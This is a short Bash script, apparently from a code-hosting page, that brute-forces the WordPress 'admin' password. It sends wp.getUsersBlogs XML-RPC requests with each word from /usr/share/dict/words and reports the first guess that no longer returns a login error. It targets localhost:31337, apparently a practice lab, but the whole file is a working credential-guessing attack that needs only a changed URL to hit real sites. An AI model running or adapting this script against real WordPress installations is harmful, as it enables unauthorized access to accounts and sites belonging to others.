39 lines
723 B
Bash
39 lines
723 B
Bash
|
#!/bin/bash
|
||
|
|
||
|
function ctrl_c() {
|
||
|
echo -e "\n\n[+] Saliendo...\n"
|
||
|
exit 1
|
||
|
}
|
||
|
|
||
|
# Ctrl + C to stop the script
|
||
|
|
||
|
trap ctrl_c SIGINT
|
||
|
|
||
|
function createXML(){
|
||
|
password=$1
|
||
|
|
||
|
xmlFile="""
|
||
|
<?xml version=\"1.0\"?>
|
||
|
<methodCall>
|
||
|
<methodName>wp.getUsersBlogs</methodName>
|
||
|
<params>
|
||
|
<param><value>admin</value></param>
|
||
|
<param><value>$password</value></param>
|
||
|
</params>
|
||
|
</methodCall>
|
||
|
"""
|
||
|
|
||
|
echo $xmlFile > file.xml
|
||
|
|
||
|
response=$(curl -s -X POST "http://localhost:31337/xmlrpc.php" -d@file.xml)
|
||
|
|
||
|
if [[ ! "$(echo $response | grep 'Incorrect username or password')" ]]; then
|
||
|
echo -e "\n\n[+] La contraseña para admin es $password\n\n"
|
||
|
exit 0
|
||
|
fi
|
||
|
}
|
||
|
|
||
|
cat /usr/share/dict/words | while read password; do
|
||
|
createXML $password
|
||
|
done
|